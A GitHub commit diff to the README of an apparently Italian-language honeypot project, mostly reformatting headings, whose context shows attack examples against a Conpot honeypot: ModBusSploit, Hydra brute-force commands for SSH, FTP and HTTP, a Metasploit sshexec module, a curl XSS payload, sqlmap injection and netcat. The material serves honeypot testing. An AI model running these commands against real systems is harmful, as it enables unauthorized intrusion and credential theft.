Update README.md

This commit is contained in:
Domenico Del Giudice 2025-03-02 14:04:38 +01:00 committed by GitHub
parent 95036e32dc
commit 0ea6df7b8b
No known key found for this signature in database
GPG key ID: B5690EEEBB952194

View file

@ -324,7 +324,7 @@ nmap -sV <indirizzo-IP> # Service version detection
<br> <br>
<br> <br>
**Testing (ModBusSploit) 🛠️** #### **Testing (ModBusSploit) 🛠️**
In this section, we will perform tests on the **[ModBusSploit](https://github.com/C4l1b4n/ModBusSploit/)** tool to simulate attacks on the Conpot honeypot. In this section, we will perform tests on the **[ModBusSploit](https://github.com/C4l1b4n/ModBusSploit/)** tool to simulate attacks on the Conpot honeypot.
@ -355,19 +355,18 @@ python3 start.py
3. **Result on Kibana dashboard:** 3. **Result on Kibana dashboard:**
<img width="1188" alt="kibana_dash" src="https://github.com/user-attachments/assets/de9c841b-830d-42d9-b778-61c270cc9c8c" /> <img width="1188" alt="kibana_dash" src="https://github.com/user-attachments/assets/de9c841b-830d-42d9-b778-61c270cc9c8c" />
<br>
<br> <br>
<br> <br>
**Brute force attack examples using Hydra:** ### **Brute force attack examples using Hydra:**
```sh ```sh
hydra -l <utente> -P <file_wordlist> ssh://<indirizzo-IP> hydra -l <utente> -P <file_wordlist> ssh://<indirizzo-IP>
hydra -l <utente> -P <file_wordlist> ftp://<indirizzo-IP> hydra -l <utente> -P <file_wordlist> ftp://<indirizzo-IP>
hydra -l <utente> -P <file_wordlist> http-get://<indirizzo-IP> hydra -l <utente> -P <file_wordlist> http-get://<indirizzo-IP>
``` ```
### **Exploitation example using Metasploit:**
**Exploitation example using Metasploit:**
```sh ```sh
msfconsole msfconsole
use exploit/linux/ssh/sshexec use exploit/linux/ssh/sshexec
@ -377,17 +376,17 @@ set PASSWORD <password>
exploit exploit
``` ```
**Example of an XSS attack using curl:** ### **Example of an XSS attack using curl:**
```sh ```sh
curl -X POST -d "username=<script>alert('XSS')</script>" http://<indirizzo-IP>/login curl -X POST -d "username=<script>alert('XSS')</script>" http://<indirizzo-IP>/login
``` ```
**SQL injection example using sqlmap:** ### **SQL injection example using sqlmap:**
```sh ```sh
sqlmap -u "http://<indirizzo-IP>/page?id=1" --risk=3 --level=5 sqlmap -u "http://<indirizzo-IP>/page?id=1" --risk=3 --level=5
``` ```
**Netcat example to connect to port 80 (HTTP):** ### **Netcat example to connect to port 80 (HTTP):**
```sh ```sh
nc -v <indirizzo-IP> 80 nc -v <indirizzo-IP> 80
``` ```